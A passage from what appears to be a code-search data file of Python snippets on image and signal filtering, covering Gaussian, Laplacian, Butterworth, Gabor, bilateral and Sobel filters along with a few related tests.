mask_f = ni.gaussian_filter(mask, sigma=sigma)\n\n return SpatialReceptiveField(mask_f, self.altPos, self.aziPos, sign=self.sign,\n temporalWindow=self.temporalWindow, pixelSizeUnit=self.pixelSizeUnit,\n dataType=self.dataType, thr=self.thr, filter_sigma=sigma,\n interpolate_rate=self.interpolate_rate)", "def isotropic_Gaussian(ksize=15, l=6):\n\n V = np.array([[1, 0], [0, -1]])\n D = np.array([[l, 0], [0, l]])\n Sigma = np.dot(np.dot(V, D), np.linalg.inv(V))\n k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize)\n\n return k", "def gs_blur(self,k,img):\n SIG = self.sigma\n sig = [SIG,k*SIG,k*k*SIG,k*k*k*SIG,k*k*k*k*SIG]\n gsArray = [0,1,2,3,4]\n scaleImages = [0,1,2,3,4]\n \n for i in range(5):\n gsArray[i] = scipy.ndimage.filters.gaussian_filter(img,sig[i])\n\n return gsArray", "def create_gaussian_filter(size, sigma):\n h = size[0] #height of the template\n w = size[1] #width of the template \n if h % 2 == 0: h += 1 #add 1 if dimensions are even\n if w % 2 == 0: w += 1\n x = math.floor(h/2)\n y = math.floor(w/2) \n sum = 0\n #create our template\n template = np.zeros((h,w))\n #fill the template in with the numbers from Gaussian distribution\n for i in range(h):\n for j in range(w):\n template[i,j] = math.exp(-((((j-x)**2)+((i-y)**2))/(2*(sigma**2))))\n sum = sum + template[i,j]\n #normalise the numbers\n gaussian_filter = template/sum\n return gaussian_filter", "def filter(self):\n\n # Calculate outliers in the multivariate Gaussian distribution analysis.\n # Returns the outliers as vector and an Ellipse object for plotting\n outliers, self._ellipse = multivariate_gaussian(\n self.liedataframe[['coul', 'vdw']],\n confidence=self.settings.confidence,\n returnellipse=True,\n edgecolor='red',\n facecolor='none')\n\n # Register outliers.\n self.liedataframe['filter_mask'] = self.liedataframe['filter_mask'].values + numpy.array(outliers)\n\n # Check outliers for any cases leading to all but one pose to be marked as\n # outlier. Not wise to include this in the boltzmann weighted sheme.\n logger.info(\n \"Outlier detection. Outliers: {0} of {1} points, method: Multivariate Gaussian distribution.\"\n \"Confidence interval {2:.3f}\".format(\n outliers.sum(), self.liedataframe[['coul', 'vdw']].size, self.settings.confidence))\n\n return self.liedataframe", "def differenceOfGausssians(image,sigma0, sigma1,window_size, roi, out = None):\n return (vigra.filters.gaussianSmoothing(image,sigma0,window_size=window_size,roi = roi)-vigra.filters.gaussianSmoothing(image,sigma1,window_size=window_size,roi = roi))", "def smooth(img, sigma):\n if sigma < 0:\n raise ValueError('smoothing kernel size is negative')\n elif sigma == 0:\n return img.get_data()\n else:\n sigma_vox = sigma / np.sqrt(np.sum(img.get_affine()[0:3, 0:3] ** 2, 0))\n return nd.gaussian_filter(img.get_data(), sigma_vox)", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def edgesMarrHildreth(img, sigma):\n\tsize = int(2*(np.ceil(3*sigma))+1)\n\n\tx, y = np.meshgrid(np.arange(-size/2+1, size/2+1), np.arange(-size/2+1, size/2+1))\n\t\n\tnormal = 1 / (2.0 * np.pi * sigma**2)\n\n\tkernel = ((x**2 + y**2 - (2.0*sigma**2)) / sigma**4) * np.exp(-(x**2+y**2) / (2.0*sigma**2)) / normal # LoG filter\n\n\tkern_size = kernel.shape[0]\n\tlog = np.zeros_like(img, dtype=float)\n\n\t# applying filter\n\tfor i in range(img.shape[0]-(kern_size-1)):\n\t\tfor j in range(img.shape[1]-(kern_size-1)):\n\t\t\twindow = img[i:i+kern_size, j:j+kern_size] * kernel\n\t\t\tlog[i,j] = np.sum(window)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\n\tlog = log.astype(np.int64, copy=False)\n\n\tzero_crossing = np.zeros_like(log)\n\n\t# computing zero crossing\n\tfor i in range(log.shape[0]-(kern_size-1)):\n\t\tfor j in range(log.shape[1]-(kern_size-1)):\n\t\t\tif log[i][j] == 0:\n\t\t\t\tif (log[i][j-1] < 0 and log[i][j+1] > 0) or (log[i][j-1] < 0 and log[i][j+1] < 0) or (log[i-1][j] < 0 and log[i+1][j] > 0) or (log[i-1][j] > 0 and log[i+1][j] < 0):\n\t\t\t\t\tzero_crossing[i][j] = 255\n\t\t\tif log[i][j] < 0:\n\t\t\t\tif (log[i][j-1] > 0) or (log[i][j+1] > 0) or (log[i-1][j] > 0) or (log[i+1][j] > 0):\n\t\t\t\t\tzero_crossing[i][j] = 255 \n\n\t# plotting images\n\tfig = plt.figure()\n\ta =fig.add_subplot(1,2,1)\n\timgplot = plt.imshow(log, cmap='gray')\n\ta.set_title('Laplacian of Gaussian')\n\ta = fig.add_subplot(1,2,2)\n\timgplot = plt.imshow(zero_crossing, cmap='gray')\n\tstring = 'Zero Crossing sigma = '\n\tstring += (str(sigma))\n\ta.set_title(string)\t\n\tplt.show()\n\t\n\treturn zero_crossing", "def test_gaussian_filter():\n\n def rgb2gray(rgb):\n r, g, b = rgb[:, :, 0], rgb[:, :, 1], rgb[:, :, 2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n\n return gray\n\n img = rgb2gray(np.array(Image.open('data/graf.png')))\n gx, x = gauss_module.gauss(4)\n gx = gx.reshape(1, gx.shape[0])\n gy = gx.reshape(gx.shape[1], gx.shape[0])\n smooth_img = conv2(img, gx * np.array(gy))\n\n test_smooth_img = gauss_module.gaussianfilter(img, 4)\n\n assert np.all(smooth_img.round(5) == test_smooth_img.round(5))", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 9, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def __init__(self):\n kernel=numpy.array([[-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]])\n VConvolutionFilter.__init__(self,kernel)", "def pseudo_flatfield(img_plane, sigma=5):\n filtered_img = gaussian_filter(img_plane, sigma)\n return img_plane / (filtered_img + 1)", "def smooth_gauss(image, variance=2, kernel_size=(9, 9)):\n return cv2.GaussianBlur(image, kernel_size, variance)", "def __gaussian_blur(self, img, kernel_size=3):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)", "def apply_smoothing(image, kernel_size=3):\n return cv2.GaussianBlur(image, (kernel_size, kernel_size), 0)", "def gaussian_blur(self,img):\n return cv2.GaussianBlur(img, (self.kernel_size, self.kernel_size), 0)", "def _gap_filter(self):\n res = self.cfg.resolution\n xedges = np.linspace(self.lrx[0]-res/2., self.lrx[-1]+res/2.0, len(self.lrx)+1)\n yedges = np.linspace(self.lry[0]-res/2., self.lry[-1]+res/2.0, len(self.lry)+1)\n\n # Calculates point density of als shots per DEM grid cell\n self.rzhist, xe, ye = np.histogram2d(self.x[self.nonan].flatten(),\n self.y[self.nonan].flatten(),\n bins=[xedges, yedges])\n self.rzhist = self.rzhist.transpose()\n data_mask = self.rzhist > 0.0\n\n filter_algorithm = self.cfg.gap_filter[\"algorithm\"]\n if filter_algorithm == \"maximum_filter\":\n data_mask = maximum_filter(data_mask, **self.cfg.gap_filter[\"keyw\"])\n else:\n raise NotImplementedError(\"Filter algorithm: %s\" % filter_algorithm)\n\n self.dem_mask = ~data_mask", "def gaborFilter(img, ksize=31):\n filters = []\n #ksize = 31\n for theta in np.arange(0, np.pi, np.pi / 16):\n kern = cv2.getGaborKernel((ksize, ksize), 4.0, theta, 10.0, 0.5, 0, ktype=cv2.CV_32F)\n kern /= 1.5*kern.sum()\n filters.append(kern)\n accum = np.zeros_like(img)\n for ker in filters:\n fimg = cv2.filter2D(img, cv2.CV_8UC3, ker)\n np.maximum(accum, fimg, accum)\n return accum", "def filtering(self):\r\n # 1 ###########################################################################################################\r\n fft_image = np.fft.fft2(self.image)\r\n # 2 ###########################################################################################################\r\n fft_shift_image = np.fft.fftshift(fft_image)\r\n\r\n ###\r\n mag_dft = np.log(np.abs(fft_shift_image))\r\n mag_dft = (255 * (mag_dft / np.max(mag_dft))).astype(dtype='uint8')\r\n ###\r\n\r\n # 3 ###########################################################################################################\r\n if self.filter_name == 'butterworth_l' or self.filter_name == 'butterworth_h':\r\n mask = self.filter(fft_shift_image.shape, self.cutoff, self.order)\r\n else:\r\n mask = self.filter(fft_shift_image.shape, self.cutoff)\r\n # 4 ###########################################################################################################\r\n # multiply the dft (fft shift image) by the mask\r\n filtered_image = fft_shift_image * mask\r\n\r\n ###\r\n mag_filtered_image = mag_dft * mask\r\n ###\r\n\r\n # 5 ###########################################################################################################\r\n inverse_fft_shift_image = np.fft.ifftshift(filtered_image)\r\n # 6 ###########################################################################################################\r\n inverse_fft_image = np.fft.ifft2(inverse_fft_shift_image)\r\n # 7 ###########################################################################################################\r\n mag_image = np.zeros(inverse_fft_image.shape, dtype=complex)\r\n for i in range(inverse_fft_image.shape[0]):\r\n for j in range(inverse_fft_image.shape[1]):\r\n if inverse_fft_image[i][j] < 0:\r\n mag_image[i][j] = -1 * inverse_fft_image[i][j]\r\n else:\r\n mag_image[i][j] = inverse_fft_image[i][j]\r\n # magnitude of inverse fft is complete\r\n # 8 ###########################################################################################################\r\n full_contrast_image = self.post_process_image(mag_image)\r\n\r\n return [mag_dft, mag_filtered_image, full_contrast_image]", "def apply_filter(self, image):\n pass", "def smooth_image(self, image, mask):\n \n filter_size = self.smoothing_filter_size.value\n if filter_size == 0:\n return image\n sigma = filter_size / 2.35\n #\n # We not only want to smooth using a Gaussian, but we want to limit\n # the spread of the smoothing to 2 SD, partly to make things happen\n # locally, partly to make things run faster, partly to try to match\n # the Matlab behavior.\n #\n filter_size = max(int(float(filter_size) / 2.0),1)\n f = (1/np.sqrt(2.0 * np.pi ) / sigma * \n np.exp(-0.5 * np.arange(-filter_size, filter_size+1)**2 / \n sigma ** 2))\n def fgaussian(image):\n output = scipy.ndimage.convolve1d(image, f,\n axis = 0,\n mode='constant')\n return scipy.ndimage.convolve1d(output, f,\n axis = 1,\n mode='constant')\n #\n # Use the trick where you similarly convolve an array of ones to find \n # out the edge effects, then divide to correct the edge effects\n #\n edge_array = fgaussian(mask.astype(float))\n masked_image = image.copy()\n masked_image[~mask] = 0\n smoothed_image = fgaussian(masked_image)\n masked_image[mask] = smoothed_image[mask] / edge_array[mask]\n return masked_image", "def filter_unsharp(img: np.ndarray, blur_algo='median', kernel_size=None, strength=0.3, unsharp_algo='laplacian'):\n #h,w,c = img.shape\n imgtype = img.dtype\n \n #can randomize strength from 0.5 to 0.8\n # if strength is None:\n # strength = np.random.uniform(0.3, 0.9)\n \n if unsharp_algo == 'DoG':\n #If using Difference of Gauss (DoG)\n #run a 5x5 gaussian blur then a 3x3 gaussian blr\n blur5 = cv2.GaussianBlur(img,(5,5),0)\n blur3 = cv2.GaussianBlur(img,(3,3),0)\n DoGim = blur5 - blur3\n img_out = img - strength*DoGim\n \n else: # 'laplacian': using LoG (actually, median blur instead of gaussian)\n #randomize kernel_size between 1, 3 and 5\n if kernel_size is None:\n kernel_sizes = [1, 3, 5] #TODO: ks 5 is causing errors\n kernel_size = random.choice(kernel_sizes)\n # Median filtering (could be Gaussian for proper LoG)\n #gray_image_mf = median_filter(gray_image, 1)\n if blur_algo == 'median':\n smooth = cv2.medianBlur(img.astype(np.uint8), kernel_size)\n # Calculate the Laplacian (LoG, or in this case, Laplacian of Median)\n lap = cv2.Laplacian(smooth,cv2.CV_64F)\n # Calculate the sharpened image\n img_out = img - strength*lap\n \n # Saturate the pixels in either direction\n img_out[img_out>255] = 255\n img_out[img_out<0] = 0\n \n return img_out.astype(imgtype)", "def test_filter_linear(self):\n input_image = np.array([\n 0.01, 0.1, 0.2, 0.5, 0.75, 0.99\n ])\n expected_image_lower = np.array([\n 0.240, 0.329, 0.427, 0.725, 0.974, 1.213\n ])\n expected_image_upper = np.array([\n 0.241, 0.330, 0.428, 0.726, 0.975, 1.214\n ])\n output_config = FilterImageConfig()\n output_config.blur.linear = True\n output_config.blur.sigma = 5\n output_config.effect.mode = \"global\"\n output_config.effect.lum_scale = 5\n output_config.effect.chrom_scale = .1\n output_config.effect.level = 5\n output = localHDR.filter_image(input_image, output_config)\n self.assertTrue(np.allclose(output, expected_image_lower, atol=6e-03))\n self.assertTrue(np.allclose(output, expected_image_upper, atol=6e-03))", "def _filter_gauss(image: np.array,\n axis: str,\n krnsize: int,\n krnsigma: float):\n assert(axis == 'x' or axis == 'y')\n krn = cv.getGaussianKernel(krnsize, krnsigma)\n krn = krn * krn.T\n krny, krnx = np.gradient(krn)\n\n if axis == 'x':\n return _filter_custom(image, krnx)\n elif axis == 'y':\n return _filter_custom(image, krny)", "def remove_bao_gaussian_filtering(self, k, pk, Lambda = 0.25):\n # Extrapolate\n kLinear, pLinear = UF.extrapolate_log(k, pk, 1e-6, 1e6)\n dqlog = np.diff(np.log10(kLinear))[0]\n\n # EH spectrum with rescaling\n pEH = self.EisensteinHu_nowiggle_Pk(z=0, k=kLinear)[1][0]\n pEH /= pEH[0]/pLinear[0]\n\n # Smooth, interpolate and evaluate\n smoothPowerSpectrum = gaussian_filter1d(pLinear/pEH, Lambda/dqlog)*pEH\n smoothPowerSpectrum_int = si.interp1d(kLinear,smoothPowerSpectrum,'cubic')\n smoothPowerSpectrum = smoothPowerSpectrum_int(k)\n\n return smoothPowerSpectrum", "def gaussian2d(filter_size=5, sig=1.0):\n ax = np.arange(-filter_size // 2 + 1., filter_size // 2 + 1.)\n xx, yy = np.meshgrid(ax, ax)\n kernel = np.exp(-0.5 * (np.square(xx) + np.square(yy)) / np.square(sig))\n return kernel / np.sum(kernel)", "def bilateral_filter(img, n, sigma_s, sigma_r):\n filter_ = build_filter(n, sigma_s)\n \n original_shape = list(img.shape)\n\n pad = n//2\n img = padding(img, pad)\n \n new_img = np.zeros_like(img)\n\n for i in range(pad, original_shape[0]+pad):\n for j in range(pad, original_shape[1]+pad):\n # Operations happen vectorially around img[i][j]\n \n # Grid centered in img[i][j]\n sub_matrix = img[i-pad:i+pad+1, j-pad:j+pad+1]\n\n gr = gaussian(sub_matrix-img[i][j], sigma_r)\n \n wt = np.multiply(gr, filter_)\n w = np.sum(wt)\n\n pixel = np.sum(np.multiply(wt, sub_matrix))\n pixel = pixel/w\n\n new_img[i][j] = pixel\n\n new_img = unpadding(new_img, pad)\n \n return new_img", "def blurImage1(in_image: np.ndarray, kernel_size: np.ndarray) -> np.ndarray:\r\n size = kernel_size[0]\r\n sigma = 1\r\n x, y = np.mgrid[-size:size + 1, -size:size + 1]\r\n normal = 1 / (2.0 * np.pi * sigma ** 2)\r\n g = np.exp(-((x ** 2 + y ** 2) / (2.0 * sigma ** 2))) * normal\r\n in_image = cv2.filter2D(in_image, -1, g)\r\n return in_image", "def gaussian_blurring(self,input_image,kernel_size,sigma):\n #Applying Gaussian Blur filter\n output_image=cv2.GaussianBlur(input_image,kernel_size,sigma)\n return output_image", "def get_butterworth_low_pass_filter(shape, cutoff, order):\n \n \n print(\"butterworth_low_pass_filter = \")\n print(\"cutoff: \",cutoff)\n print(\"order: \",order)\n filter = np.zeros(shape)\n for i in range(shape[0]):\n for j in range(shape[1]):\n D = np.sqrt((i - (shape[0] / 2)) ** 2 + (j - (shape[1] / 2)) ** 2)\n filter[i, j] = 1 / (1 + (D / cutoff) ** (2 * order))\n # print(\"\\n\\n\\n\\n\")\n # print(filter)\n # return filter\n return process_filter(image, filter)", "def moffat_convolution(im_array,n_fwhm,beta,fwhm) :\n\n r_s = fwhm/(2. *math.sqrt(2.**(1./beta)-1.))\n\t\n im_kernel_array = gauss_kernel(n_fwhm,beta,r_s)\n conv_image = signal.convolve(im_array,im_kernel_array,mode = 'same')\n\n return (conv_image)", "def features_sigma(img,\n sigma,\n intensity=True,\n edges=True,\n texture=True):\n\n features = []\n\n gx,gy = np.meshgrid(np.arange(img.shape[1]), np.arange(img.shape[0]))\n # print(gx.shape)\n #features.append(gx)\n gx = filters.gaussian(gx, sigma)\n gy = filters.gaussian(gy, sigma)\n\n features.append(np.sqrt(gx**2 + gy**2)) #use polar radius of pixel locations as cartesian coordinates\n\n del gx, gy\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Location features extracted using sigma= %f' % (sigma))\n\n img_blur = filters.gaussian(img, sigma)\n\n if intensity:\n features.append(img_blur)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Intensity features extracted using sigma= %f' % (sigma))\n\n if edges:\n features.append(filters.sobel(img_blur))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Edge features extracted using sigma= %f' % (sigma))\n\n if texture:\n H_elems = [\n np.gradient(np.gradient(img_blur)[ax0], axis=ax1)\n for ax0, ax1 in itertools.combinations_with_replacement(range(img.ndim), 2)\n ]\n\n eigvals = feature.hessian_matrix_eigvals(H_elems)\n del H_elems\n\n for eigval_mat in eigvals:\n features.append(eigval_mat)\n del eigval_mat\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Texture features extracted using sigma= %f' % (sigma))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image features extracted using sigma= %f' % (sigma))\n\n return features", "def sobelfilter(D, W):\n here, plus, minus = slice(1, -1), slice(2, None), slice(None, -2)\n # Estimate slopes along each axis at each pixel.\n Dx = 0.5 * (D[:, plus] - D[:, minus])\n Dy = 0.5 * (D[plus, :] - D[minus, :])\n # Calculate the corresponding inverse variances.\n Wp, Wm = W[:, plus], W[:, minus]\n Wx = 0.25 * np.divide(Wp * Wm, Wp + Wm, out=np.zeros_like(Wp), where=Wp + Wm > 0)\n Wp, Wm = W[plus, :], W[minus, :]\n Wy = 0.25 * np.divide(Wp * Wm, Wp + Wm, out=np.zeros_like(Wp), where=Wp + Wm > 0)\n # Average slope estimates along the other axis with weights (1, 2, 1).\n WDx = Wx[minus, :] * Dx[minus, :] + 2 * Wx[here, :] * Dx[here, :] + Wx[plus, :] * Dx[plus, :]\n Wxsum = Wx[minus, :] + 2 * Wx[here, :] + Wx[plus, :]\n Dx = np.divide(WDx, Wxsum, out=np.zeros_like(WDx), where=Wxsum > 0)\n WDy = Wy[:, minus] * Dy[:, minus] + 2 * Wy[:, here] * Dy[:, here] + Wy[:, plus] * Dy[:, plus]\n Wysum = Wy[:, minus] + 2 * Wy[:, here] + Wy[:, plus]\n Dy = np.divide(WDy, Wysum, out=np.zeros_like(WDy), where=Wysum > 0)\n # Estimate the 2D gradient magnitude.\n Dg = np.zeros_like(D)\n Dg[here, here] = np.hypot(Dx, Dy)\n return Dg", "def __preliminar_image(self,img,name):\n\n\n height, width, _ = img.shape\n #self.__showImage(img,name)\n img_gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n kernel_size = (3,3)\n gauss_img = cv2.GaussianBlur(img,kernel_size,0)\n \n img_hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n \n l_red_hsv = np.array([0, 100, 100], dtype = np.uint8)\n u_red_hsv = np.array([10, 255, 255], dtype = np.uint8)\n l_red_hsv2 = np.array([160, 100, 100], dtype = np.uint8)\n \n u_red_hsv2 = np.array([179, 255, 255], dtype = np.uint8)\n red_mask_hsv1 = cv2.inRange(img_hsv,l_red_hsv,u_red_hsv)\n red_mask_hsv2 = cv2.inRange(img_hsv,l_red_hsv2,u_red_hsv2)\n red_mask_hsv = red_mask_hsv1 + red_mask_hsv2\n \n l_red = np.array([0,0, 80], dtype = np.uint8)\n u_red = np.array([50,50, 255], dtype = np.uint8)\n red_mask = cv2.inRange(img, l_red, u_red)\n \n filter_byw = red_mask +red_mask_hsv \n filter_img = cv2.bitwise_and(gauss_img, gauss_img, mask=cv2.bitwise_or(red_mask,red_mask_hsv))\n \n return filter_img, filter_byw", "def build_laplacian_pyramid(im, max_levels, filter_size):\n pyr = []\n org_reduce, filter_vec = build_gaussian_pyramid(im, max_levels, filter_size)\n for i in range(max_levels - 1):\n temp_expand = expand(org_reduce[i + 1], filter_vec)\n org_layer = org_reduce[i]\n temp = org_layer - temp_expand\n pyr.append(temp)\n # plt.imshow(org_reduce[-1], cmap='gray')\n # plt.show()\n pyr.append(org_reduce[-1])\n return pyr, filter_vec", "def compute(self):\n Y = self.data[1]\n # Create an order 3 lowpass butterworth filter\n b, a = signal.butter(3, 0.05)\n # Apply the filter to Y. Use lfilter_zi to choose the initial condition of the filter\n zi = signal.lfilter_zi(b, a)\n z, _ = signal.lfilter(b, a, Y, zi=zi * Y[0])\n # Apply the filter again, to have a result filtered at an order the same as filtfilt\n z2, _ = signal.lfilter(b, a, z, zi=zi * z[0])\n # Use filtfilt to apply the filter\n self.data[2] = signal.filtfilt(b, a, Y)\n self.data[3] = self.data[2] - self.data[1] - self.dataSpan * 0.3\n self.updatePlot()", "def lowpass(data,filterSize=None):\n\n def convolve(signal,kernel):\n pad=np.ones(len(kernel)/2)\n signal=np.concatenate((pad*signal[0],signal,pad*signal[-1]))\n signal=np.convolve(signal,kernel,mode='same')\n signal=signal[len(pad):-len(pad)]\n return signal\n\n def kernel_gaussian(size=100, sigma=None, forwardOnly=False):\n if sigma is None:\n sigma=size/10\n size=int(size)\n points=np.exp(-np.power(np.arange(size)-size/2,2)/(2*np.power(sigma,2)))\n if forwardOnly:\n points[:int(len(points)/2)]=0\n return points/sum(points)\n\n if filterSize is None:\n filterSize=len(data)/10\n kernel=kernel_gaussian(size=filterSize)\n data=convolve(data,kernel) # do the convolution with padded edges\n return data", "def run_gaussian_smoothing(image, kernel_size=5):\n return cv2.GaussianBlur(image, (kernel_size, kernel_size), 0)", "def filtering(self):\n from numpy import fft\n import numpy as np\n\n _image_dft = fft.fft2(self.image)\n _image_dft = fft.fftshift(_image_dft)\n # dft = DFT.DFT()\n # plt.figure(1) \n # plt.imshow(self.image)\n # plt.figure(2)\n # plt.imshow(20*np.log10(abs(_image_dft))) \n # print(_image_dft)\n # print(abs(_image_dft))\n # plt.show()\n filter = self.filter(self.image.shape, self.cutoff, self.order) \\\n if self.filter_name.startswith('butterworth') \\\n else self.filter(self.image.shape, self.cutoff)\n \n _image_dft_filtered = _image_dft * filter\n _image_filtered = abs(fft.ifft2(_image_dft_filtered))\n \n return [ self.post_process_image(_image_filtered), \\\n self.post_process_image(20*np.log10(abs(_image_dft)+.00001)), \\\n self.post_process_image(20*np.log10(abs(_image_dft_filtered)+.00001)) ]", "def og_features(scan,filt=None,base_noise=None,thresh=-1.4781e-10,diff=1,verbose=False,scale=10):\n #get gradients of data\n der = np.array(np.gradient(scan,diff))\n \n #calculate gardient magnitudes and directions\n der_mag = np.linalg.norm(der,axis=0) \n der_uvecs = der/der_mag\n \n z_cur = np.copy(scan).ravel()\n\n #estimate noise level and set derivative filter threshold\n if filt is None:\n filt = np.mean(signaltonoise(der_mag)[-1])\n \n \n if base_noise is not None:\n filt = np.maximum(filt,base_noise)\n \n\n\n #filter directions and magnitudes\n x, y, z = der_uvecs[0].ravel(), der_uvecs[1].ravel(), der_mag.ravel()\n \n #filter using threshold and filt\n x_filt, y_filt, z_filt = x[z_cur>thresh], y[z_cur>thresh], z[z_cur>thresh]\n #x_filt, y_filt, z_filt = x, y, z\n\n \n #print(len(z_filt))\n x_filt, y_filt, z_filt = x_filt[z_filt>filt], y_filt[z_filt>filt], z_filt[z_filt>filt]\n\n \n #calculate angles\n angles_filt = np.sign(y_filt)*np.arccos(x_filt/1)\n\n \n #print(len(angles_filt))\n \n if len(angles_filt) < 2:\n return 0,0,0\n \n #fit single line\n sol1 = least_squares(ress_1line,[-np.pi/2],args=(angles_filt,),bounds=[-np.pi,0],method='dogbox',jac='2-point',max_nfev=2000)\n\n #fit two lines by grid search\n #sol_grid = grid_search(ress_2line,angles_filt,[[-np.pi,0],[-np.pi,0]])\n \n \n singleline = sol1.x[0]\n \n mx = np.minimum(np.abs(singleline-(-np.pi)),np.abs(singleline))\n \n sol_grid = grid_search(ress_2line_pm,angles_filt,[[0,mx]],umid = singleline)\n spread_lines = sol_grid[1]\n sol_grid[1] = [singleline+spread_lines,singleline-spread_lines]\n \n \n #compute average of squared residuals for both cases\n resid1 = ress_1line(sol1.x,angles_filt)\n\n grid_c11 = np.average(np.power(resid1,2))\n \n grid_c11 = np.average(np.abs(resid1))\n \n grid_c21 = sol_grid[-1]\n \n \n multip = cotunnel_score2(scan,scan>thresh,diff,scale)\n \n final_grid2 = multip*(grid_c11-grid_c21)\n \n \n \"\"\"\n plt.scatter(angles_filt,z_filt,marker='x',c='k',s=15,linewidth=0.4)\n plt.axvline(sol1.x,color='b')\n plt.axvline(sol1.x+(np.pi),color='b')\n plt.axvline(sol_grid[1][0],0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1],0,color='r', linestyle='--')\n \n plt.axvline(sol_grid[1][0]+(np.pi),0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1]+(np.pi),0,color='r', linestyle='--')\n \n plt.xlabel(\"$\\\\theta_g$ / rad\")\n \n plt.xlim([-np.pi,np.pi])\n plt.ylim([0,z.max()])\n \n \n plt.ylabel(\"$|g|$\")\n \n plt.xticks([-np.pi,0,np.pi])\n \n plt.locator_params(axis='y', nbins=2)\n \n plt.savefig(\"og_fig.svg\")\n \n plt.show()\n \"\"\"\n return final_grid2,multip,(grid_c11-grid_c21)", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn sp.ndimage.convolve1d(data, kernel, axis=2)", "def flatten(img,sigma=20.) :\n\n for i in range(img.shape[0]) :\n img[i] /= np.median(img[i])\n for i in range(img.shape[1]) :\n img[:,i] /= np.median(img[:,i])\n\n hw=int(3*sigma)\n u=np.linspace(-hw,hw,2*hw+1)\n x=np.tile(u,(2*hw+1,1))\n y=x.T\n k=np.exp(-x**2/2/sigma**2-y**2/2/sigma**2)\n k /= np.sum(k)\n smooth=convolve2d(img,k,weight=None)\n img /= smooth\n\n return img", "def ParticleFilterParams(fix_params=False):\n\n ## Particle filter parameters\n\n # Q_c will be the time continuous covariance matrix. \n #This should be the errors in the model.\n # in the form [x_cov, y_cov, z_cov, \n # vel_x_cov, vel_y_co, vel_z_cov, \n # mass_cov, \n # sigma_cov, shape_cov, brightness_cov, tau_cov]\n \n\n Q_c = [10., 2., 2., \n 150., 50., 50., \n 5., 0, 0,\n 1e-3, 1e-10, 0., 0.0001]\n\n\n print('Qc values used:', Q_c)\n\n Q_c = np.asarray([i**2 for i in Q_c])\n\n \n # Q_c_frag is used at reinitialisation if the fragmentation option is used\n \n Q_c_frag = [0., 0., 0., \n 0.02, 0.02, 0.02, \n 0.5, 0, 0,\n 2e-3, 5e-9, 0., 0.]\n\n Q_c_frag = [i**2 for i in Q_c_frag]\n\n ## P: starting uncertainty to initialise gaussian spread of particals. \n ## P2: starting uncertainty at reinitialisation if the fragmentation option is used\n ## in the form [x_cov, y_cov, z_cov, % of vel_x_cov, % of vel_y_co, % of vel_z_cov]\n P = [50., 50., 50., 250., 250., 250.]\n P2 = [50., 50., 50., 250., 250., 250.]\n\n ## Initialise state ranges\n\n\n ## shape parameter close to a rounded brick (1.8) (A for a sphere =1.21)\n A_min = 1.21\n A_max = 3.0 \n\n ## luminosity coefficient\n tau_min = 0.0001\n tau_max = 0.1\n\n ## lists of typical meteorite densities for different types. [chond, achond, stony-iron, iron, cometary]\n pm_mean = [3000, 3100, 4500, 7500, 850]\n pm_std = [420, 133, 133, 167, 117 ]\n\n ## to choose density values according to a distribution of meteorite percentages:\n particle_choices = []\n\n # this is created using lines 257-266; uncomment if needs changing.\n random_meteor_type = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 3, 3, 3, 3, 3, 4, 4]\n\n #random_meteor_type = []\n #for i in range(80): # 80 % Chondrites\n # random_meteor_type.append(0)\n #for i in range(11): # 11 % Achondrites\n # random_meteor_type.append(1)\n #for i in range(2):\n # random_meteor_type.append(2) # 2 % Stony-Iron\n #for i in range(5):\n # random_meteor_type.append(3) # 5 % iron\n #for i in range(2):\n # random_meteor_type.append(4) # 2 % cometary\n\n ## ablation coefficeint \n #sigma_min = 0.001*1e-6\n #sigma_max = 0.5*1e-6\n\n\n #range_params = [m0_max, A_mean, A_std, pm_mean, pm_std, random_meteor_type, cd_mean, cd_std, sigma_min, sigma_max, K_min, K_max, tau_min, tau_max]\n range_params = [A_min, A_max, pm_mean, pm_std, random_meteor_type, tau_min, tau_max]\n\n if fix_params:\n 